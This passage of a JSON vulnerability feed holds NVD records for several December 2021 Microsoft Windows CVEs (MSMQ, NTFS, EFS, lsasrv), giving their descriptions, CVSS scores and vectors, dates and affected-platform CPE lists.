"cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:47", "description": "Microsoft Message Queuing Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-43222.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43236", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43222", "CVE-2021-43236"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43236", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43236", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:46", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43229, CVE-2021-43231.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43230", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43230", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43230", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:47", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43229, CVE-2021-43230.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43231", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-43231", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43231", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:45", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43230, CVE-2021-43231.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43229", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43229", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43229", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:47:45", "description": "Windows Encrypting File System (EFS) Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43217", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43217"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43217", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:47:43", "description": "Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43216", "cwe": ["CWE-668"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43216"], "modified": "2022-05-23T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43216", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", 